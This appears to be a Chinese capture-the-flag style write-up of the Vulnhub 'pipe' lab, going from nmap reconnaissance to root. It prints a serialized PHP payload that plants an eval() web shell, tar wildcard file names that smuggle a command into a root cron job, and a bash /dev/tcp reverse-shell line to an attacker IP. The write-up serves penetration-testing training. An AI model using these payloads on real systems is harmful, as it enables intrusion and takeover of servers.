【Vulnhub系列靶场】Vulnhub-pipe 靶场渗透

原文转载已经过授权
原文链接：Lusen的小窝 - 学无止尽，不进则退 (lusensec.github.io)

一、环境配置

1、解决IP扫描不到问题

2、打开虚拟机，并修改网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

2、端口扫描

1、粗略快速扫描

nmap.exe -F 192.168.31.63

2、精细化扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.63
nmap.exe -sU --min-rate 10000 -p- 192.168.31.63

3、全扫描和漏洞扫描

nmap.exe -sT -sV -sC -O -p22,80,111 192.168.31.63
nmap.exe --script=vuln -p22,80,111 192.168.31.63

22端口的ssh采用SSH-2协议的6.7p1版本，位于Debian 5操作系统上。80端口采用apache的http服务，标题是一个401未经许可的字样。111端口的是一个 RPC （远程过程调用）端口映射程序。

似乎存CVE-2007-6750 漏洞

3、web目录扫描

dirsearch.cmd -u http://192.168.31.63 -x 404,403

dirb http://192.168.31.63 -X .php,.html,.txt,.zip,.tar,.rar,.sql

响应都是401

4、web框架识别

whatweb http://192.168.31.63

三、获取shell立足点

1、敏感信息收集

1、这个网站访问就需要登录凭证

2、pipe.jpg文件

查看images 目录

将该文件下载下来，使用exiftool工具对图片分析

wget http://192.168.31.63/images/pipe.jpg

并没有什么发现

2、尝试登录

采用bp抓包查看

错误信息给出提供的账号或密码错误，另外说了一段您的浏览器不知道如何提供凭据

我们采用POST方式重新放包

成功进来如下页面：

下方有一个链接，在点击之后发生了请求

抓包查看，疑似是一个反序列化的URL编码

同时这里暴漏出来一个路径

发现新的文件

居然是一个php 的class类，可以进行日志文件的写入，我们正好配合反序列化漏洞来使用

3、获取shell立足点

经过尝试，根目录下的文件我们都需要登录凭证，我们将日志文件写在/var/www/html/images/shell.php 文件，内容为<?php eval($_POST[1]);?>

O:3:"Log":2:{s:8:"filename";s:30:"/var/www/html/images/shell.php";s:4:"data";s:24:"<?php eval($_POST[1]);?>";}

为了方便，我们直接用蚁剑进行连接

四、提权至root

1、信息收集

1、/etc/passwd文件：存在rene 用户

2、/home/rene目录：存在777 的文件夹

是一个.gz 文件疑似备份文件，我们通过http 下载到本地

dpkg -l #查看当前用户能使用的命令

我们可以开启一个python2 的http服务，下载解压到指定目录

python -m SimpleHTTPServer 8080
wget http://192.168.31.63:8080/backup.tar.gz
tar -xvf backup.tar.gz
tar zxvf backup.tar.gz -C backup	#backup目录要存在

上网查了一下：

sys-19858.BAK: 可能是一个 OpenPGP 密钥的备份文件。
	OpenPGP（开放式PGP）是一种标准，用于加密和签名电子通信数据，以确保数据的机密性和完整性。PGP 代表“Pretty Good Privacy”（相当不错的隐私），是由 Phil Zimmermann 开发的一种加密软件。我们需要知道文件类型、加密方式，利用方式较难
sys-28346.BAK: 可能是 Dyalog APL 版本 43.-79 的备份文件
	如果是 Dyalog APL 用户，可以还原到备份版本的环境，但我们并不是该用户，无法利用

3、/etc/crontab：计划任务

会以root 权限执行两个.sh 脚本

我们只能查看其中的/usr/bin/compress.sh 文件，tar 将/home/rene/bachup目录下的文件删除并又通过tar 命令进行了压缩

我们可以使用通配符进行提权

2、tar通配符提权

进入/home/rene/backup目录

echo "" > /home/rene/backup/--checkpoint=1
echo "" > /home/rene/backup/--checkpoint-action=exec='bash shell.sh'
echo "bash -i >&/dev/tcp/192.168.31.50/5555 0>&1" > /home/rene/backup/shell.sh
#这里最后一条在蚁剑中执行失败，我们可以切换到nc上执行

并在本地进行nc 监听5555端口

原文转载已经过授权
更多文章请访问原文链接：Lusen的小窝 - 学无止尽，不进则退 (lusensec.github.io)